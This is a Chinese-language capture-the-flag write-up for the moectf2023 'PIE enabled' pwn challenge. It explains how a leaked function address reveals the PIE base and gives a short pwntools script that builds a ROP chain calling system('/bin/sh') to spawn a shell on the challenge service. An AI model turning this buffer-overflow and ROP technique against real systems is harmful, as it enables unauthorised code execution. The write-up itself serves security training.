moectf2023 - PIE enabled

RocketDev

文件分析

下载pwn, NX on, PIE on, Canary off, RELRO full
ghidra分析为64位程序

解题思路

vuln函数直接把自己的地址打印出来了...直接减一减拿到piebase就和之前的题一样了

EXPLOIT

1
2
3
4
5
6
7
8
9
10
11
from pwn import *
sh = remote('localhost', 46153)
sh.recvuntil(b'is:') # skip
elf = ELF('pwnpie')
vuln = elf.symbols['vuln']
pieBase = int(sh.recvline()[2:14], 16) - vuln # 做完才发现int可以直接从bytes转换,不一定是str
shstrAddr = pieBase + 0x4010
popRdiAddr = pieBase + 0x1323
systemAddr = pieBase + 0x11d8
sh.sendline(b'0'*0x58 + p64(popRdiAddr) + p64(shstrAddr) + p64(systemAddr))
sh.interactive()

Done.

  • 标题: moectf2023 - PIE enabled
  • 作者: RocketDev
  • 创建于 : 2023-09-24 12:00:00
  • 更新于 : 2024-07-25 12:34:56
  • 链接: https://rocketma.dev/2023/09/24/pie_enabled/
  • 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
评论
目录
moectf2023 - PIE enabled